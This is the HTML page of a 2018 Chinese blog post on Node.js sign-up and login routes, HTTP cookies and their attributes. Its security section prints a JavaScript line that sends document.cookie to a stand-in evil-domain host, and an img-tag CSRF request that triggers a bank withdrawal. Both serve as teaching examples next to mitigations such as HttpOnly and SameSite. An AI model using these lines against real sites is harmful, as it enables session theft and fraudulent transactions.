<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="Wei Yangle">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Wei Yangle">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>HTTP系列 -- 注册登录 + Cookie · Arvin Wei&#39;s Studio</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/tag.png" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >Arvin&#39;s Studio.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">HTTP系列 -- 注册登录 + Cookie</a>
            </div>
    </div>
    
    <a class="home-link" href=/>Arvin's Studio.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            HTTP系列 -- 注册登录 + Cookie
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">2.6k</span>阅读时长: <span class="post-count reading-time">10 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/09/21</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>概述</p>
<p>我们每天在使用电脑的时候都会去注册或者登录，作为前端是必须要了解其中的过程的。</p>
<p>注册<br> 后端</p>
<p> 后端需要一个路由，当用户请求注册界面时，后端要去读取注册界面，之后发给前端，并且还要设置 method</p>
<p>–GET ==&gt; 请求注册页面<br>else if( path === ‘/sign_up’ &amp;&amp; method === ‘GET’){<br>    let string = fs.readFileSync( ‘./sign_up.html’, ‘utf-8’ )<br>    response.setHeader( ‘Content-Type’, ‘text/html;charset=utf-8’ )<br>    response.statusCode = 200<br>    response.write( string )<br>    response.end()<br>}</p>
<p>–POST ==&gt; 用户注册发送数据（使用表单 | AJAX）<br>else if( path === ‘/sign_up’ &amp;&amp; method === ‘POST’ ){<br>    // 拿到前端 POST 的数据，之后进行处理，拿到后端想要的结构<br>    readBody( request ).then( () =&gt; {}, () =&gt; {} )<br>    // 后端进行验证<br>    // 1. 验证用户输入是否合格<br>    // 2. 验证用户名是否占用 | 邮箱是否占用（都是去和自己的数据库进行比较）<br>    // 3. 验证失败 ==&gt; 以 JSON 格式传输给前端错误,400<br>    // 4. 验证成功 ==&gt; 存储数据库，200<br>}<br>function readBody( request ){<br>    return new Promise( ( resolve, reject ) =&gt; {<br>        let body = []<br>        request.on( ‘data’, ( chunk ) =&gt; {<br>            body.push( chunk )<br>        }).on( ‘end’, () =&gt; {<br>            body = Buffer.concat( body ).toString()<br>            resolve( body )<br>        })<br>    })<br>}</p>
<p>前端<br>  跳转注册界面<br>  <a href="/sign_up.html"></a></p>
<p>提交用户输入数据<br>1.拿到用户输入，可以监听 form 的 submit 事件<br>2.前端验证<br>  验证成功 ==&gt; 下一步<br>  验证失败 ==&gt; 提示用户<br>3.发送请求（数据是第四部分 formdata）<br>  form 的 submit<br>  $post()<br>4.成功（打印 response） ==&gt; 200 + 渲染页面<br>5.失败（打印 response） ==&gt; JSON 格式的字符串 + 解析 + 提示用户</p>
<p>登录<br>  后端<br>后端需要一个路由，当用户请求登录界面时，后端要去读取登录界面，之后发给前端，并且还要设置 method</p>
<p>GET ==&gt; 请求注册页面<br>else if( path === ‘/sign_in’ &amp;&amp; method === ‘GET’){<br>    let string = fs.readFileSync( ‘./sign_in.html’, ‘utf-8’ )<br>    response.setHeader( ‘Content-Type’, ‘text/html;charset=utf-8’ )<br>    response.statusCode = 200<br>    response.write( string )<br>    response.end()<br>}<br>POST ==&gt; 用户登录发送数据（使用表单 | AJAX）<br>else if(path===’/sign_in’ &amp;&amp; method === ‘POST’){<br>    // 拿到前端 POST 的数据，之后进行处理，拿到后端想要的结构<br>     readBody( request ).then( () =&gt; {}, () =&gt; {} )<br>    // 后端进行数据库比对<br>    // 1. 比对用户是否存在<br>    // 2. 比对用户输入密码是否正确<br>    // 3. 比对失败 ==&gt; 以 JSON 格式传输给前端错误,400<br>    // 4. 比对成功 ==&gt; 设置 Cookie ，200<br>    response.setHeader( ‘Set-Cookie’,  ‘xxx’ ) // xxx 就是一个身份证</p>
<p>前端</p>
<p>跳转登录界面<br><a href="/sign_in.html"></a></p>
<p>提交用户输入数据<br>1.拿到用户输入，可以监听 form 的 submit 事件<br>2.前端验证<br>验证成功 ==&gt; 下一步<br>验证失败 ==&gt; 提示用户<br>3.发送请求（数据是第四部分 formdata）<br>form 的 submit<br>$post()<br>4.成功（打印 response） ==&gt; 200 + 渲染页面<br>5.失败（打印 response） ==&gt; JSON 格式的字符串 + 解析 + 提示用户</p>
<p>Cookie<br>服务器发送到用户浏览器并保存在用户本地的一小块数据，它会在浏览器下次向同一服务器再次发起请求时被携带并发送到服务器上。通常，它用于告知服务端两个请求是否来自同一浏览器，如保持用户的登录状态。Cookie使基于无状态的 HTTP 协议记录稳定的状态信息成为了可能</p>
<p>用途<br>Cookie 主要用于以下三个方面</p>
<p>1.会话状态管理（如用户登录状态、购物车、游戏分数或其他需要记录的信息）<br>2.个性化设置（如用户自定义设置、主题等）<br>3.浏览器跟踪行为（如跟踪用户行为等）</p>
<p>前端设置 Cookie<br>通过 document.cookie API 可以获取或设置当前文档相关联的 Cookie</p>
<p>读取 Cookie<br>let  allCookie = document.cookie</p>
<p>设置（写一个新的）Cookie<br>document.cookie = newCookie</p>
<p>newCookie 是一个键值对形式的字符串，使用这个方法一次只能对一个<br>Cookie 进行设置或更新。以下可选 Cookie 属性值可以跟在键值对后，用来具体化对 Cookie 的设置或更新，使用分号进行分隔</p>
<p>;path = path ==&gt; 如果没有定义，默认为当前文档位置的路径</p>
<p>;domain = domain ==&gt; 如果没有定义，默认为当前文档位置的路径的域名部分</p>
<p>;max-age = max-age-in-seconds ==&gt; 过期时长</p>
<p>;expires = date-in-GMTString-format ==&gt; 如果没有定义，Cookie 会在会话结束时过期</p>
<p>;secure ==&gt; Cookie 只能通过 HTTPS 传输</p>
<p>document.cookie = “someCookieName=true; expires=Fri, 31 Dec 9999 23:59:59 GMT; path=/“;</p>
<p>后端 + code<br>后端验证成功（200）时会设置一个 Cookie 响应头</p>
<p>response.setHeader(‘Set-Cookie’, ‘xxx’ ) // xxx 就是一个身份证<br>设置 Cookie 之后的同源请求都会带着 Cookie</p>
<p>会话期 Cookie<br>浏览器关闭后会自动删除，它仅在会话期有效。会话期 Cookie 不需要指定过期时间（Expirse）或者有效期（Max-Age）</p>
<p>持久性 Cookie<br>持久性 Cookie 可以指定一个特定的过期时间（Expirse）或有效期（Max-Age）</p>
<p>response.setHeader( ‘Set-Cookie’, ‘id = xxx; Expirse = 时间点（Max-Age = 时长）’ )<br>secure 标记<br>安全的 Cookie 只应通过 HTTPS 协议加密过的请求发送给服务端，设置 secure 标记的 Cookie 只在 HTTPS 中生效</p>
<p>HttpOnly 标记<br>由于 Cookie 可以通过 JS 的 document.cookie 进行修改，但是通过 JS 的 document.cookie 无法访问带有 HttpOnly 标记的 Cookie，所以包含服务端 Session 信息的 Cookie 不想被浏览器的 JS 脚本调用，设置 HttpOnly 标记即可</p>
<p>response.setHeader( ‘Set-Cookie’, ‘id = a3fWa; Expires = GMT时间格式; Secure; HttpOnly’ )<br>Cookie 作用域<br>Domain + Path 标识定义了 Cookie 的作用域，即 Cookie 应该发送给那些 URL</p>
<p>Domain ==&gt; 制定哪些主机可以接收 Cookie，如果不指定，不包含子域名，如果指定了 Domain 则一般包含子域名。例如，如果设置 Domain = mozilla.org，则 Cookie 也包含在子域名中（如 developer.mozilla.org）</p>
<p>Path ==&gt; 制定了主机下哪些路径可以接收 Cookie（该 URL 路径必须存在于请求 URL 中）。例如，设置 Path = /docs，那么以下路径都会匹配 /docs | /docs/web | /docs/web/http</p>
<p>SameSite Cookie<br>SameSite Cookie 允许服务器指定在跨站请求时该 Cookie 是否会被发送，从而可以阻止跨站请求伪造攻击（CSRF）</p>
<p>安全<br>会话挟持和 XSS<br>在 web 应用中，Cookie 常用来标记用户或授权会话，因此如果 web 应用的 Cookie 被窃取，可能导致授权用户的会话受到攻击。常用的窃取 Cookie 的方法有利用社会工程学攻击和利用应用程序漏洞进行 XSS 攻击</p>
<p>(new Image()).src = “http://www.evil-domain.com/steal-cookie.php?cookie=” + document.cookie;<br>HttpOnly 类型的 Cookie 由于阻止了 JS 对 Cookie 的操作而能在一定程度上缓解此类攻击</p>
<p>CSRF（跨域请求伪造）<br>如果在不安全的聊天室或论坛上的一张图片，它实际上是一个给你银行服务器发送提现的请求</p>
<p><img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory"><br>当打开含有这张图片的 HTML 页面时，如果之前登录了银行账号并且 Cookie 仍然有效（还没有其他验证步骤），银行中的钱会被自动转走。</p>
<p>阻止 CSRF<br>对用户输入进行过滤来阻止 XSS<br>任何敏感操作都需要确认<br>用于敏感信息的 Cookie 只能拥有较短的生命周期</p>
<p>Cookie 特点<br>1.Cookie 储存用户信息<br>2.服务器通过 Set-Cookie 响应头设置 Cookie<br>3.浏览器得到 Cookie 后，每次请求相同域名都要带上 Cookie<br>4.服务器通过 Cookie 得知是哪个用户（request.headers.cookie // 读取 Cookie ）<br>5.Cookie 存储在本地的一个文件中<br>6.Cookie 不安全，用户可以通过开发者工具 Application/Cookie 可以进行修改，或者 JS 的 document.cookie 进行修改<br>7.每个浏览器的 Cookie 不同<br>8.Cookie 有时效性<br>9.后端可以强制设置 Cookie 有效期<br>10.Cookie 按域名划分。一个网站只会带着自己域名的 Cookie ，不会带着其他域的 Cookie</p>
<p>Cookie 说明<br>Cookie 大小受限，每次请求新的页面 Cookie 都会被发送过去。Cookie 不能跨域调用。Cookie 的作用是与服务器进行交互，Cookie 作为 HTTP 规范的一部分存在</p>
<p>删除 Cookie<br>服务器端可以通过设置 Expires、max-age 两个标签将 Cookie 设置为过期状态<br>JavaScript 可以通过document.cookie API 删除 Cookie</p>
<p>相关知识点<br>1.formdata 是一段一段上传的，上传时会触发 data 事件（node http get post data）</p>
<p>2.前端是不安全的，所以前端可以不进行验证，但是后端必须进行验证。用户可以通过 curl 发送请求，这样就越过了前端 JS</p>
<p>3.decodeURIComponent()<br>用于解码由 encodeURIComponent() 方法或其他类似方法编码的部分 URI（统一资源标识符）</p>
<p>4.Set-Cookie</p>
<p>5.CSRF（跨域请求伪造） 是指一种挟持受信任用户向服务器发送非预期请求的攻击方式。例如，这些非预期请求可能在 URL 后加入一些恶意的参数，从而达到攻击者的目的</p>
<p>6.XSS（Cross-site scripting）是一种安全漏洞，攻击者利用这种漏洞在网上注入恶意的客户端代码。当被攻击者登录网站时就会自动运行这些恶意代码，从而攻击者可以突破网站的访问权限，冒充受害者。</p>
<p>如果 Web 应用程序没有部署足够的安全验证，那么这些脚本可以任意读取 Cookie或者其他敏感的网站信息，或者让恶意脚本重写 HTML 内容<br>以下两种情况最容易发生 XSS 攻击<br>数据从一个不可靠的链接进入一个 Web 应用程序<br>没有过滤掉恶意代码的动态内容被发送给 Web 用户</p>
<p>XSS 攻击类型<br>存储型（持久型）：注入型脚本永久存储在目标服务器上，当浏览器请求数据时，脚本从服务器上传回并执行<br>反射型（非持久型）：当用户点击一个恶意链接，或者提交一个表单，或者进入一个恶意网站时，注入脚本进入被攻击者的网站，Web 服务器将注入脚本，比如一个错误信息、搜索结果等返回到用户浏览器上，浏览器会执行这个脚本，因为，浏览器认为这个响应来自可信任的服务器</p>
<p>基于 DOM 的 XSS：被执行的恶意脚本会修改页面脚本结构</p>

    </article>
    <!-- license  -->
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2018/09/17/第二篇博客/" title= "使用 Hexo + GitHub 可以轻松搞出一个好看的博客">
                    <div class="prevTitle">使用 Hexo + GitHub 可以轻松搞出一个好看的博客</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:weiyangle@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/ArvinWei" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/img/wechat.jpg" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 2
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/21</span><a class="archive-post-title" href= "/2018/09/21/Cookie/" >HTTP系列 -- 注册登录 + Cookie</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/17</span><a class="archive-post-title" href= "/2018/09/17/第二篇博客/" >使用 Hexo + GitHub 可以轻松搞出一个好看的博客</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "Wei Yangle"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


